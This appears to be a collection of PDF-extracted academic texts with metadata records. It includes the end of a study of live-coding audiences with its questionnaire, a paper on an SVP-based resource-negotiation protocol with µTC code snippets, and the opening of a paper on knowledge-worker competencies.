legible’ (P49) provide some support for Perera’s (2013) suggestion that the code is not always essential to the enjoyment of live coding performance. However, live coding performances often demand patience of their audiences and in such cases the code can be an asset: ‘One of the things with live coding is patience, as a set starts up it’s often quite sparse so the audience almost have to be patient with it. The projected code in some way negotiates that by showing that something is happening’ (P45). If the code takes on the role of ‘performer’ in live coding events then the way in which that is accessible and visible becomes crucial in order for the audience to have an optimal experience. **Audience expectations for live coding events** In the same way that audiences for other kinds of events have expectations for events (cf. Burland & Pitts, 2012) audiences for live coding events have expectations for the quality of the code: the code has to connect with the aural experience (‘It is important for me to be able to relate the code to the outcome’ (P14)) and should complement the experience rather than monopolise it. For example, one participant stated ‘Mostly I am annoyed by the visual display as it pulls the focus away from the human performers and the listening. And because projection is usually large, one is “pulled in” to read’ (P41). There is an obvious contradiction within the sample of respondents here; on the one hand the projected code is seen as an essential part of the live coding experience, but on the other it can be a source of frustration as it becomes a sole focus of attention. Many of the participants enjoy the opportunity to learn from the projected code; their expectations for the code are high and there is disappointment when these are not met: ‘I am most interested when I can follow the coding process but disappointed when all the code is already written down and there is no real coding process to follow or no time to at least read the prepared code. Then I just focus on the music or visual result’ (P37). There is also an expectation for ‘algorithmic gymnastics’ (P80), which suggests that high levels of technical virtuosity are also required from some audience members. There is a sense that the audience also expect some communication from the performers and observe that the code does facilitate this, although there is recognition that the presentation of the events still needs improvement: ‘I really enjoy seeing the projected code. I still think the community has a long way to go in terms of stagecraft while preserving the legibility of code’ (P11). **Conclusions** This paper aims to explore audience motivations to attend, and their experiences of, live coding events, examining in particular the role and impact of the source code and the visible creation of music in real-time. The findings suggest that live coding events attract knowledgeable and informed audiences who want to have unpredictable, surprising and original experiences. In this respect, they share many characteristics with audiences for jazz and contemporary classical music (Burland & Pitts, 2012; Pitts & Gross, 2015). Live coding audiences share much excitement about the innovative and experimental nature of the music which inspires them to attend events as frequently as possible, but also to make their own coded music at home (or publicly). However, live coding audiences are distinct in relation to the relatively narrow range of professions they represent, which focus largely on roles related to, or involving, technology. With this in mind, the transparency of the projected code is a strong appeal of these performances which offer opportunities for learning and sharing new ideas. There is a clear sense of community associated with the events – audiences identify strongly with each other and feel that they are together contributing to the future face of the music. The performances themselves seem to rely heavily on the multimodal experience – there are instances where either the code or music are unsatisfactory and in such cases the opportunity to appreciate one mode or another is appealing. There is a call amongst the respondents here for the stagecraft of live coding performances to be improved – reports of illegible, incomprehensible or disappointing code were frequent – and stories of how the projected code can spoil the atmosphere of events need to be kept in mind. Live coding performance is still relatively new and the openness of the field to constant challenge and evolution is refreshing, and it is this uncertainty which is undoubtedly appealing to its performers and audiences. Understanding the ways in which this music, which is sometimes challenging and impenetrable to those not in the know, manages to generate new and young audiences is extremely valuable as other forms of music and art face the constant threat of declining audiences. This paper has highlighted the ways in which audiences respond to the multimodal nature of live coded music and offers a starting point for future explorations of the ways in which audiences interact with, and experience, new and cutting edge music. References Appendix One: Audience Questionnaire Information about you 1. Are you: [ ] 17 or under [ ] 18-25 [ ] 26-35 [ ] 36-45 [ ] 46-55 [ ] 56-65 [ ] 66-75 [ ] 76 or over 2. What is your gender? ____________________________________________ 3. What is your current occupation? ______________________________________ Attending Live Coding Events 4. What are your main reasons for attending Live Coding Events? (Please tick all that apply) [ ] I have been before and enjoyed them. [ ] I like the style of music [ ] I enjoy hearing live music of high quality. [ ] I am a coding enthusiast. [ ] I really like the artists who are performing [ ] I am involved in performances at this or similar events. [ ] I wanted to try something new. [ ] I came with friends [ ] Other (please give details): _____________________________________________ 5. How often do you attend Algoraves or Live Coding Events? ______________________________________ 6. How do you decide which gigs to attend? (Please tick all that apply) [ ] The performer(s) [ ] Particular instruments [ ] Cost [ ] Venue [ ] My availability [ ] Friends’ availability [ ] General interest in the event [ ] Recommendation [ ] Other (please give details): _____________________________________________ 7. What appeals to you most about Live Coding Events? 8. To what extent do you engage with the projected code at these events? 9. What is the impact of the projected code on your experience of the event? 10. From your perceptions of other people attending these events, how would you describe a typical audience member? • Age and gender ________________________________________________________________ • Musical interests/experience ____________________________________________________ • Likely occupation ______________________________________________________________ • Other characteristics ____________________________________________________________ 11. How closely do you fit the pattern you have described above? 12. What is your level of experience (if any) with computer programming? Music in your life 13. How often do you attend live music events? [ ] once a week [ ] several times a month [ ] every so often [ ] rarely 14. What types of music do you most often choose when attending live performances? 15. How often do you listen to recorded music? [ ] every day [ ] several times a week [ ] once a week [ ] every so often [ ] rarely [ ] never 16. What kinds of music do you prefer when listening to recorded music? 17. To what extent is listening to music and attending gigs an important part of your life? 18. Are you involved in singing, playing or coding music yourself? If so, please give details. 19. Would you describe yourself as a musician? Please explain ...
{"Source-Url": "http://eprints.whiterose.ac.uk/109223/10/Burland_McLean_FINAL.pdf", "len_cl100k_base": 6752, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 31097, "total-output-tokens": 8886, "length": "2e12", "weborganizer": {"__label__adult": 0.00231170654296875, "__label__art_design": 0.11993408203125, "__label__crime_law": 0.0015134811401367188, "__label__education_jobs": 0.044647216796875, "__label__entertainment": 0.059967041015625, "__label__fashion_beauty": 0.0013599395751953125, "__label__finance_business": 0.0026988983154296875, "__label__food_dining": 0.0029048919677734375, "__label__games": 0.0064697265625, "__label__hardware": 0.0040435791015625, "__label__health": 0.00295257568359375, "__label__history": 0.0009202957153320312, "__label__home_hobbies": 0.0011081695556640625, "__label__industrial": 0.0011186599731445312, "__label__literature": 0.008819580078125, "__label__politics": 0.0022907257080078125, "__label__religion": 0.002368927001953125, "__label__science_tech": 0.08880615234375, "__label__social_life": 0.0027599334716796875, "__label__software": 0.030426025390625, "__label__software_dev": 0.60791015625, "__label__sports_fitness": 0.00200653076171875, "__label__transportation": 0.0016880035400390625, "__label__travel": 0.0008587837219238281}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 37407, 0.02703]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 37407, 0.2125]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 37407, 0.93842]], "google_gemma-3-12b-it_contains_pii": [[0, 1576, false], [1576, 3642, null], [3642, 6569, null], [6569, 10013, null], [10013, 11553, null], [11553, 14528, null], [14528, 18092, null], [18092, 21393, null], [21393, 25132, null], [25132, 28558, null], [28558, 31609, null], [31609, 33993, null], [33993, 34607, null], [34607, 37407, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1576, true], [1576, 3642, null], [3642, 6569, null], [6569, 10013, null], [10013, 11553, null], [11553, 14528, null], [14528, 18092, null], [18092, 21393, null], [21393, 25132, null], [25132, 28558, null], [28558, 31609, null], [31609, 33993, null], [33993, 34607, null], [34607, 37407, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 37407, null]], "pdf_page_numbers": [[0, 1576, 1], [1576, 3642, 2], [3642, 6569, 3], [6569, 10013, 4], [10013, 11553, 5], [11553, 14528, 6], [14528, 18092, 7], [18092, 21393, 8], [21393, 25132, 9], [25132, 28558, 10], [28558, 31609, 11], [31609, 33993, 12], [33993, 34607, 13], [34607, 37407, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 37407, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
6945e7306d9d425432dd221d11a5af525e9f1c11
An architecture and protocol for the management of resources in ubiquitous and heterogeneous systems based on the SVP model of concurrency Jesshope, C.R.; Philippe, J-M.; van Tol, M.W. Published in: Lecture Notes in Computer Science DOI: 10.1007/978-3-540-70550-5_25 Citation for published version (APA): General rights It is not permitted to download or to forward/distribute the text or part of it without the consent of the author(s) and/or copyright holder(s), other than for strictly personal, individual use, unless the work is under an open content license (like Creative Commons). Disclaimer/Complaints regulations If you believe that digital publication of certain material infringes any of your rights or (privacy) interests, please let the Library know, stating your reasons. In case of a legitimate complaint, the Library will make the material inaccessible and/or remove it from the website. Please Ask the Library: http://uba.uva.nl/en/contact, or a letter to: Library of the University of Amsterdam, Secretariat, Singel 425, 1012 WP Amsterdam, The Netherlands. You will be contacted as soon as possible. UvA-DARE is a service provided by the library of the University of Amsterdam (http://dare.uva.nl) An Architecture and Protocol for the Management of Resources in Ubiquitous and Heterogeneous Systems based on the SVP model of Concurrency Chris Jesshope\textsuperscript{1}, Jean-Marc Philippe\textsuperscript{2}, and Michiel van Tol\textsuperscript{1} \textsuperscript{1} University of Amsterdam, Institute for Informatics Kruislaan 403, Amsterdam 1098 SJ, Netherlands \textsuperscript{2} CEA LIST, DRT/DTSI/SARC/LCE, CEA-Saclay Batiment 528 Point Courrier 94, F-91191 Gif sur Yvette Cedex, France {jesshope,mwvantol}@science.uva.nl,jean-marc.philippe@cea.fr Abstract. This paper proposes a novel hierarchical architecture and resource-management protocol for the delegation of work within a ubiquitous and heterogeneous environment. The protocol is based on serving SVP places to delegate a component of work together with the responsibility for meeting any non-functional computational requirements such as deadline or throughput constraints. The protocol is based on a market where SANE processors bid for jobs to execute and selection is based on a cost model that reflects the energy required to meet the jobs requirements. Key words: concurrency models, heterogeneous systems, resource management, market models, ubiquitous systems. 1 Introduction As CMOS nodes continue to shrink, the complexity of embedded systems grows. This progress enables the manufacturing of low-power and low-cost consumer electronic devices able to communicate through wired or wireless technologies. Embedding computing power in everyday consumer product leads to the possibility of having systems comprising networks of thousands of nodes near each user. This will provide everyone with the possibility of processing data anywhere at any time, moving people into the pervasive computing era [1]. The design of such systems requires a dramatic shift at every level of the system as neither software nor hardware platforms are ready to face the issues raised by this exciting new research challenge. These ubiquitous systems may comprise a huge number of heterogeneous computing elements and will evolve around the users following their needs and habits. Thus, their optimisation will be highly dependant on their computing environment. Taking advantage of the huge computing power offered by this collaboration of elements will require the Fig. 1. Generic SANE (may be a collection of SANEs) responds to two protocols: one to perform work as families of threads the other to serve resources to external threads. The latter uses negotiation between SANES based on energy credits. dynamic management of concurrency, including graceful degradation under conditions where computing elements may appear and disappear at will. This is a significant challenge. To solve these issues, a disruptive approach is being promoted in the ÆTHER European project, which embeds self-adaptivity at each level of the system, giving autonomy to the components and enabling the application designer to concentrate on the application instead of having to cope with all possible events in the lifetime of a computing resource in such a rapidly evolving environment. For this purpose, we have introduced the SANE concept (Self-Adaptive Networked Entity). This views the system as a collection of self-adaptive elements (software, hardware or both) that can observe their environment and their internal performance so as to autonomously modify their behaviour in order to improve the overall system performance. These elements collaborate with each other and share information and resources in order to provide a global optimisation based on local and autonomous behaviour. This approach requires a new architecture and protocols to enable the dynamic sharing of resources and the consequent management of concurrency. The mechanism that enables this distributed sharing of resources is the delegation of responsibility for the execution of units of work, where that responsibility includes meeting performance constraints. We consider here a hierarchical cluster-based architecture, where each cluster presents a uniform interface to its environment defining it as a SANE processor (or cluster of SANEs) to be a SANE it must support the SVP model (SANE Virtual Processor) [2], see Figure 1. This paper describes the resource management protocol that enables delegation of work. SANEs are autonomous and from time to time may be given jobs to execute; a local user may submit a job or one may be delegated from its 3 More details can be found on the projects web site: http://www.aether-ist.org/ environment. In the latter case, the SANE will have contracted with an external thread to run that job and to meet certain expectations in its execution, for example performance. The contract is negotiated using a credit exchange, where the cost of executing a job is initially assumed to be the energy expended by the contracted SANE. This can be measured in Joules. The contracting thread, which may be acting on behalf of another SANE, transfers credit for the agreed amount of energy to execute the work on the contracted SANE. In response, the contracted SANE agrees to meet the deadlines or performance constraints imposed by the contracting SANE. 2 The SVP model and its resources SVP is a concurrency model that defines a number of actions to enable the execution and control of families of identical blocking threads. It is a hierarchical model and any SVP thread may create subordinate families of threads. The family (and its subordinate families) is the unit of work that is delegated in a SANE system. Implementations of the SVP model have been demonstrated and evaluated in software [3], based on the pthread library and in hardware [4], based on instructions added to the ISA of a many-core processor. The SVP model is captured by the five actions listed below and their implementation will define the underlying protocol supporting the interfaces defined in Figure 1. 1. create - creates a family of indexed threads at a place with parameters \( \{ \text{start}, \text{step}, \text{limit} \} \) defining the index sequence. It is based on one thread definition and returns a family identifier that uniquely identifies that family for asynchronous control of its execution. 2. sync - blocks until the specified family of threads and all of their writes to memory have completed. It returns an exit code that identifies how the family terminated; in the case of break, it also returns a value from the breaking thread and in the case of squeeze, it returns a family index value. 3. break - only one thread in a family can succeed in executing a break, which terminates its family and all subordinate families. It returns a break value of a type specified by the thread definition to the family’s sync action. 4. kill - asynchronously terminates a specified family of threads and all its subordinate families. 5. squeeze - asynchronously terminates a specified family of threads and any user-specified subordinate families so that it can be restarted at the squeeze point, which is returned via each squeezed family’s sync action. SVP has two essential roles. At the hardware level, it captures locality and regularity, which are key factors in mapping a computation to a set of resources, whatever they are. The mapping defines wires or synchronisers to support blocking and these must respond on a hardware timescale. Constraints in the SVP model capture this locality, which reflects the asynchrony and locality that will be required in future silicon systems. The model expresses this by constraining communication between blocking threads. The first child thread created may synchronise only with the parent thread and other created threads their predecessor thread in the family. The model, rather than the program, exposes this to the compiler in order for it to statically map a computation onto hardware, using knowledge of the target implementation. Examples are compiling the language $\mu$TC to a multi-core ISA [5] or mapping and routing a family of SVP threads to FPGA hardware. Using novel self-adaptation techniques, these SVP hardware threads may be dynamically optimised using online-routing [6]. In both cases, the implementation will be captured as one or more binary modules that support local communication. SVP’s second role captures the dynamic distribution of work between different implementations of the SVP model. This is achieved by binding an abstract resource to a unit of work on the creation of a family of threads. That resource abstraction is the SVP place which is provided by a place server. An implementation of place provides a network address and a token for authentication when creating work there. For example, when a place is served, the address is used to implement the protocol, in whatever network setting the SANE exists. More importantly, to avoid unauthorised use of a place, the place server gives both the place and the thread requesting it a token, which must be matched during the SVP create protocol. Figure 2 illustrates the events in this protocol. It should be noted that the create action in this role is a form of a remote procedure call. The use of place as an abstraction allows the dynamic binding of resources to code when creating a family of threads. The place also identifies a contract between two SANEs when delegating work, as illustrated in Figure 1, and hence it identifies a set of resources or virtual resources on which the work will be executed. This may be a partition of a multi-core chip, it may be a domain in an FPGA chip that is dynamically configured to execute the family of threads or it may even be a processor or cluster of processors in a Grid. Each will have its own implementation of the SVP actions and tools to compile $\mu$TC into that implementation. To achieve this abstraction, every implementation of SVP must deal with two pre-defined places and variables of type place: – The local place is used to tell the SVP implementation that all threads in this family should be kept local to the creating thread, which may have different interpretations in different implementations. – The default place is resource naive and will be determined by mapping and scheduling algorithms of the SANE implementation. – A place variable has a meaning dependent on the specific implementation of SVP. It is set by a place server and used as a parameter of the create action. The place concept is a heavily overloaded: it identifies a contract between a thread and a SANE, which will specify a level of service; it also embeds an address and a security key, which are used in the implementation of the create action to delegate the work. Once a SANE receives some delegated work, locally that work becomes resource naive and will be mapped and scheduled by the local mapping and scheduling threads (see Figure 1). These threads use the place to identify the contract negotiated and hence locate the specific constraints on execution agreed to. They must then organise the work to meet the constraints on the contract. 3 Resource negotiation in SVP The aim of SVP is to give a concurrency model that is as ubiquitous in its application as the sequential model. The two roles of SVP described above reflect a separation of concerns between algorithm design and concurrency engineering. Resource-naive SVP code is similar to the sequential model in that it has properties of determinism and deadlock freedom under composition. An SVP implementation is therefore free to map and schedule threads as it likes. However, when introducing resources via places, i.e. introducing concurrency engineering, it is necessary to introduce non-deterministic choice, to support broadcast and to provide graceful degradation. All of these issues are discussed below before the resource server protocol is presented. **Mutual exclusion in SVP.** Non-deterministic choice is required to manage exclusivity of resource use in a distributed environment. The place server must offer its service to a number of client threads that all compete for the available resources. This is achieved in SVP by providing mutual exclusion at a place rather than in memory, which is asynchronous. A mutually exclusive place sequentialises concurrent requests to create a family of threads. As places abstract resources, this is just another overloading of the concept of place that can be mapped to its implementation. For example, in the pthread implementation of SVP [3], a mutually exclusive place simply uses a mutex. In the ISA version of SVP [4], mutual exclusion in a single processor is implemented by class bits in the place variable and corresponding state in the processor. The state indicates whether an exclusive family of that class is currently executing and hence sequentialises create actions in any of the classes. The resource management protocol is called the SEP interface and is a mutually exclusive place (the System Environment Place) at which external threads create the protocol’s threads to request and obtain places for their exclusive use in the delegation of work. Broadcast in SVP. Because SVP is a deterministic model, which does not include any communication primitives, broadcast in the model must be implemented as a create action to one of a number known of places. For example, if a SANE cluster comprised $n$ SANEs, where each SANE provided an SEP interface at a place, which was stored in the array of places SEP_cluster[n], then the $\mu TC$ code below would broadcast a request to each SEP interface in the cluster. N.b. the create parameters are: (family id; place; start; limit; step; block) followed by a thread definition. In this code, $n$ threads in family $fo$ are created locally, each of which creates an SEP_request at an SEP interface. ``` int n; place SEP_cluster[n]; family fo; ... create(fo;local;0;n-1;1;){ family fi; index i; create(fi;SEP_cluster[i];0;0;1;) SEP_request(...); sync(fi); } sync(fo); ``` Graceful degradation in SVP. Now consider what happens to this code if one of the SANEs in the cluster suddenly drops out before completing the request. The code deadlocks, as one thread in family $fo$ will wait forever for its sync and hence family $fo$ will never complete. One solution to this, and in general for any situation that requires graceful degradation, is a time-out on the create action, which allows family $fo$ to wait a finite time before it completes. This can be implemented using a time-out thread, which kills family $fo$ after a given time. 4 Resource management protocol The implementation of the resource negotiation protocol in a SANE environment, like the SVP protocol over which it is implemented, is dependent on a SANE’s level in its hierarchy. The generic protocol must provide for the requirements of systems at many different levels, from chip to board level and at many levels in a network hierarchy. The protocol comprises five stages: announce, request, bid, agree, delegate. Specific implementations may omit stages that are implicit in the design at that level. For example, the first stage requires a SANE processor to announce its capabilities to the rest of the system. In an on-chip environment, the capability of each SANE processor may be known a-priori and this stage may be omitted. However, for a SANE processor at the board level attached to a network or coming into range of a wireless network, this stage would be mandatory. Announce. In the first stage of the protocol, a SANE joining a cluster announces its capabilities using a common format for defining both resource capabilities and requirements. The protocol uses the concept of a root SEP, which is not necessarily a single, fixed place but an place variable via which all resource negotiation takes place. The root SEP and its possible implementations Fig. 3. Remainder of protocol, i.e. request, bid, agree and delegate, is undertaken when a thread requires resources to undertake a computation. are described in more detail in Section 5. On joining a network, some low-level communication protocol will first be established and on top of that a protocol for implementing SVP. The latter will initialise the joining SANE with a place to initiate the SEP protocol; that place is the root SEP and is similar in concept to the router in a conventional network. The joining SANE announces its arrival by creating the SEP_announce thread at the root SEP. Only one parameter is required, which is a pointer to the record(s) defining its capabilities. Those capabilities are defined using a domained ID that defines a set of known functions on the network. The domained ID serves to identify the processing domain of the work (signal processing, image processing, etc.) and the particular function offered or required. The root SEP can filter any requests for resources by the capability requested and hence reduce the amount of communication required. It does not make sense, for example, to send a request based on image processing to a SANE that does not implement any image-processing algorithms. The capability is defined as a processing rate on this set of functions. Note that the domains may represent functions at various levels of granularity, i.e. from arithmetic operations to complex functions. This step is illustrated in the µTC code below. The SANE may also withdraw its capabilities from the pool using the SEP_withdraw thread. Of course it may also be withdrawn in a less graceful manner! place root_SEP; family f_ann; struct capability* my_capability; ... create(f_ann;root_SEP;0;0;1;;) SEP_announce(mycapabilities); Request. Having announced itself to its environment, a SANE may now make or receive requests for resources. These requests are again made to the root SEP, which will in turn forward the requests to any SANE in the environment that is capable of meeting the request. This is defined as a required performance on a given function but also includes an elapsed time for which the resources are required. A timeout is attached to each request, which is the validity of the invitation to tender from the contractor. The request (and subsequent bids) are identified by the family identifier of the thread created in making the request. **Bid.** Each bid will provide the following: a yes/no answer to the request and if yes, it will provide the overall cost for meeting the request, the time required to configure the resources, a lifetime (the provider will reserve these resources for this amount of time), the SEP to which agreement must be sent and a limit on the time the provider is able to provide resources, which may be less than or greater than the elapsed time requested. The cost can be in any agreed units but the use of energy allows the optimisation of the complete SANE system based on a (time, energy) couple. This step is illustrated below in $\mu$TC and illustrated in Figure 3. ``` place root_SEP; family req f; struct resource* my_request; struct bid* my_bid, *good_bid; ... create(req;root_SEP;0;0;1;;) SEP_request(my_request, my_bid); ``` **Accept.** When the thread requesting resources receives the list of bids, it will select one or more bids to meet its requirements and agree a contract with the provider. In response, the provider will return a place that defines the contracted resources. The family identifier of the initial request for resources identifies the contract. This stage is equivalent to signing the contract and, in a full market system, will result in a credit transfer from the requesting SANE to the providing SANE. ``` place root_SEP work_place; family f Req, f; struct bid* my_bid, good_bid; ... create(f;good_bid*.place;0;0;1;;) SEP_agree(f Req,work_place); ``` **Delegate.** All that is left to do when the work_place has been returned is to create the delegated work at that place and to signal the release of that place when that work is complete. ``` place root_SEP work_place; ; family f Req, f; struct bid* my_bid, *good_bid; ... create(f; work_place;;;;) my_work(); ... sync(f) ... create(f;*good_bid.place;0;0;1;;) SEP_release(work_place); ``` 5 The root SEP The root SEP is a conceptual place and admits many different implementations. It is first and foremost, the place to which a SANE announces itself and to which it directly requests for resources. It is assumed that directly or indirectly, all known SANEs in a cluster may be reached from this place. Two examples of its implementation are given below that illustrate the range of possibilities. A unique root SANE. The root SANE is the physical root of the cluster and is given responsible for maintaining a complete picture of the capabilities of all SANEs that have announced themselves within the cluster. It also provides an interface to the next level of hierarchy, which is called the environment in this paper. In this case, the implementation is trivial, at initialisation this SANE provides any joining SANE with its root SEP which is then used as a target for all announce and request threads. The only problem in this implementation is that it relies on the root SANE being fault tolerant, as it is a single point of failure in the entire system. Note that if a single root SEP becomes overloaded, its resources can easily be partitioned and allocated to two root SANEs known by two subsets of SANEs. Every SANE is the root SEP. Here, every SANE in the cluster receives announcements from all SANEs joining the cluster. In this case, on initialisation, each SANE must receive the SEP of all SANEs in the cluster and is responsible for announcing itself to all of them. Now it can broadcast its own requests to the cluster. This solution has maximum redundancy. Other solutions provide various forms of partitioning, e.g peer-to-peer style approaches, where a particular SANE may know only of its immediate neighbours and where broadcast may proceed in multiple hops over subsets of the cluster. 6 Related work The use of a distributed protocol for problem solving is not new. In 1980, Smith proposed the contract net protocol to specify distributed communication and control in a loosely-coupled, problem-solving environment [7]. In this protocol, task distribution uses a negotiation process, where an exchange of messages between nodes in the system decides which tasks are to be executed and which nodes may be able to execute those tasks. This protocol (and other work within ÆTHER [8]) adopts a managed approach to work delegation, i.e. one node, the manager, assumes responsibility for monitoring the execution of a task and processing the results of its execution. In the approach described here, both execution and the responsibility for meeting any execution constraints is delegated. Although we adopt a market model here, the focus of this paper is the architecture and protocol. Also, the market is only required to provide deviation on a cost based on energy, where the market provides a distributed mechanism to detect and react to load. Further information on market-based resource allocation can be found in the following thesis [14]. Mapping and scheduling workflows (a set of tasks with sometimes complex dependencies) onto grids, e.g. GridFlow [9] and Nimrod-G [10] has similar requirements. Here, a more pragmatic and coarse-grained approach is adopted, based on job-submission where communication between tasks uses files. These approaches typically use a cost/deadline resource management model. More recently, e.g. [11] and [12], there has been a trend towards using a just-in-time approach. Here, instead of analysing a workflow and trying to optimise a static schedule, resources are allocated on a first come, first served basis. The work described here differs from grid developments in a number of significant ways. Perhaps the first and most significant is that the ÆTHER project aims to build a complete programming solution to such distributed environments and in doing so, it has defined a model of concurrency that captures both work and resources in an abstract manner in a single integrated model [4]. We also adopts a just-in-time approach to scheduling but in our case this is required as the underlying SVP model is implemented at the level of instructions in a processors ISA and adaptations to load may occur at MHz rates, giving little time for planning a schedule. Also note that this just in time approach adapts to situations where there may be a significant latency in setting up a remote resource to perform a computation. Two examples are just-in-time compilation for different instruction sets and device configuration in FPGA like devices. In ÆTHER there is considerable interest in the design of run-time support for reconfigurable SoCs [13]. 7 Summary This paper has presented the architecture of a hierarchical SANE system, where resources are shared between SANEs by delegating both work and the responsibility to meet the deadline or requirements for that work. This architecture builds upon the SVP model of concurrency that provides an abstraction of work as a family of threads and an abstraction of resources as a place. The protocol provides a place server to define the place at which the family of threads is executed once the protocol has been completed. The protocol proposed for negotiating the use of resources is based on a cost model that uses the required energy as a baseline cost, to be modulated by market forces. A baseline implementation could use cost as simply a selection criteria with no credits being exchanged at all. In this way threads could collectively minimise energy consumption in the system. With a cost model however much richer scenarios can be envisioned, where the cost, although based on energy, is dependent on market conditions, such that at periods of high demand cost would rise. In such a scenario, one can imagine, as with our financial world, a number of SANEs cornering the market on energy credits by speculating in the market. Such cost policies and mapping strategies will be evaluated within the remaining period of the ÆTHER project in order to understand their emergent behaviour. 8 Acknowledgements The authors acknowledge support from the European Community in funding the research undertaken in the ÆTHER project. References
{"Source-Url": "https://pure.uva.nl/ws/files/4266453/59494_293368.pdf", "len_cl100k_base": 5556, "olmocr-version": "0.1.48", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 25792, "total-output-tokens": 7036, "length": "2e12", "weborganizer": {"__label__adult": 0.0004298686981201172, "__label__art_design": 0.0008325576782226562, "__label__crime_law": 0.0004458427429199219, "__label__education_jobs": 0.000965118408203125, "__label__entertainment": 0.0001398324966430664, "__label__fashion_beauty": 0.0002341270446777344, "__label__finance_business": 0.0004622936248779297, "__label__food_dining": 0.000492095947265625, "__label__games": 0.000705718994140625, "__label__hardware": 0.005313873291015625, "__label__health": 0.0009794235229492188, "__label__history": 0.000530242919921875, "__label__home_hobbies": 0.00020563602447509768, "__label__industrial": 0.00106048583984375, "__label__literature": 0.0003757476806640625, "__label__politics": 0.0003943443298339844, "__label__religion": 0.0007481575012207031, "__label__science_tech": 0.464599609375, "__label__social_life": 0.000102996826171875, "__label__software": 0.00872802734375, "__label__software_dev": 0.51025390625, "__label__sports_fitness": 0.0004074573516845703, "__label__transportation": 0.001495361328125, "__label__travel": 0.0002837181091308594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30489, 0.02523]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30489, 0.5528]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30489, 0.92025]], "google_gemma-3-12b-it_contains_pii": [[0, 1499, false], [1499, 3830, null], [3830, 6065, null], [6065, 9166, null], [9166, 11456, null], [11456, 14630, null], [14630, 17373, null], [17373, 19385, null], [19385, 21656, null], [21656, 24640, null], [24640, 27678, null], [27678, 30489, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1499, true], [1499, 3830, null], [3830, 6065, null], [6065, 9166, null], [9166, 11456, null], [11456, 14630, null], [14630, 17373, null], [17373, 19385, null], [19385, 21656, null], [21656, 24640, null], [24640, 27678, null], [27678, 30489, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 30489, null]], "pdf_page_numbers": [[0, 1499, 1], [1499, 3830, 2], [3830, 6065, 3], [6065, 9166, 4], [9166, 11456, 5], [11456, 14630, 6], [14630, 17373, 7], [17373, 19385, 8], [19385, 21656, 9], [21656, 24640, 10], [24640, 27678, 11], [27678, 30489, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30489, 0.0]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
8b7f3f525e5fc8ecacea575f6e4bd974c99e41aa
Harnessing a Knowledge Worker’s Competency: Lessons from the Software Development Teams Manasi Shukla PhD Office Nanyang Business School, S3-01B-73, Nanyang Technological University, Nanyang Avenue, Singapore-639798 Email id: somu@pmail.ntu.edu.sg Professor Vijay Sethi Dean (Business) Nanyang Business School, S3-01A-21, Nanyang Technological University, Nanyang Avenue, Singapore-639798 Email id: avsethi@ntu.edu.sg ABSTRACT In this conceptual paper, we propose that the work force can no longer be understood only as a factor of production, but must be projected as a strategic core competency of any organization. The “knowledge-based”, post-industrial economy has lead to a higher degree of pressure on the corporations to nurture and enhance their key strategic resource viz. the Knowledge worker (K-worker). Based on the resource based view and firm strategy, we hereby define the core human competency of the K-worker as a firm specific, rent-generating resource manifested in the behavior pattern of its employees that is aligned with a firm’s core business activities. Besides, our literature survey of the software developer’s field suggests the key business imperatives of future orientation, customer orientation, teamwork, problem resolution and quality. Hence, these five are hypothesized as the key human competency determinants of a software developer or a K-worker. Thus, our novel approach presupposes that the human competency grows with and around the key business activities of a business organization. The utility of this approach is projected through the lens of the systems view via the fifth discipline and integrated with the quality management practices to build a bulwark for the nurturing of human core competencies. At the heart of this systemic thinking is a shift of mind better termed as “metanoia”. We thus emphasize that k-worker management needs a more individualized and customized appreciation unlike what has been the norm so far. This strategic human competency approach is then the crucial 